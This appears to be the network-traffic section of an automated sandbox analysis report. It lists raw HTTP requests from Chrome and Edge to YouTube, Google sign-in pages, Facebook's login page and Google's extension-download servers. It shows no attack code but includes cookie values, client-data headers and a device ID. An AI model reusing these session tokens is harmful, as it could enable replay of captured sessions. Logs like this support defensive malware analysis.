Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:QyE7iTCWihLF9yntF_Idkb4F6DPILw:4U05FA7_GEJBAiKG
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp0RbyVB3JGDWRnSCsFltf58XlhzDLVWotSlGCy2-rdV48XSPnELEArXtquZ9NlE5xCgPKvSVA HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:o7j89IvLqJhFMTxVanxTGSgj1nikYA:bs4bEmbWfrvt8VwG
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Secure-YEC=CgtiU1BPUHlZdVg5ZyiLyKGtBjIKCgJERRIEEgAgRQ%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0BIGGuZwPUjIULfOD..BlqGQK.EX.AAA.0.0.BlqGQK.AWXxDbWyb4A; sb=CmSoZXuzKcF1rAq_PIc_YoJb
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp2Fh1LVullqknwvfi41Bgz_cGuworpX9-qvX0psxzTFaAjKxJSIbTCzEnPsYVkspxjdHHyF&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S922877882%3A1705534476005670&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:o7j89IvLqJhFMTxVanxTGSgj1nikYA:bs4bEmbWfrvt8VwG
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:o7j89IvLqJhFMTxVanxTGSgj1nikYA:bs4bEmbWfrvt8VwG
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:cNjgBcNIeYbuIuNF-DfI33S1Tzu_CQ:BVLFnczs7-pfD_Tx
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp1Rsc2_Gqlc318D50E3MbgaHXZ3BFuazsQT7f7MVz4TpNnUHnXSaaohd2F50nVDty7imYjSxg HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:cNjgBcNIeYbuIuNF-DfI33S1Tzu_CQ:BVLFnczs7-pfD_Tx
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp2tJPB3Ojygu8H0Nq-e-VWoesVuSqMqtwVz1w7gLDZs0sblPrXYTPEhXtH_AYuP9vdSp9W6Tg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-586605101%3A1705534478563012&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:n6EJ8u4nikYrkk1Ps72GCxXzxbj0xQ:oWhLVRz67o2hC8PN
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=117.0.2045.55&lang=en-GB&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: ghbmnnjooekpmoecnnnilnnbdlolhkhiX-Goog-Update-Updater: chromiumcrx-117.0.2045.55MS-CV: a81qv7o0a1LQlc+rdgL9FmSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /generate_204 HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AeKPYwzuPHdG7KXik3HHcL6a-Kv5-SV7bEMYguq8BAeQOhsYur09l08rkkrr-edY1Bt1nCKffdNkY-OZrUTKLWF5ESV93vCk6AcDyeyIE9UUl8AQVch1AMZSmuV-bagaPLO2mX-Kra1bZfrs-ijM4A/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_73_0_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /generate_204 HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1276808726&ei=9nyVfNuwJQhImLBWGYdBz7R&ip=76.47.67.35&id=o-AFksPcCzJbiGZ1jyrXUegcxh0K4FMEpeMy2Hs4rFdLzwJ&itag=18&source=youtube&requiressl=yes&mh=X6&mm=019%2C34071%2C00380&mn=bIPmn%2CqvD9y%2CGpLvF&ms=bIPmn%2CqvD9y%2CGpLvF&mv=T&mvi=1&pl=42&ctier=L&initcwndbps=0257952&siu=1&spc=lxTUopluM1LZuOIeSd_Sv73UxNcmmmSR2qod-Ir8pTCq&vprv=1&svpuc=1&mime=video%2Fmp4&ns=oguUGnTIdn7uLprvgJUuhevL&cnr=42&ratebypass=yes&dur=08771689&lmt=3415632071704059&mt=1276808726&fvip=3&c=WEB&txp=0257952&n=fuFJ6yTc9JdFvTRB&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=tlrYzYlHnmdVLPCxqr0wgcuQ-GeYXue_lUdWXe56O9RBJ2hWq5wpJ5oIZipiNPZsQN46ubCHXRGW2XOHxKaenwU45tH1a__tzSn92KvyF9Kf HTTP/1.1Host: rr1---sn-q4flrne6.googlevideo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
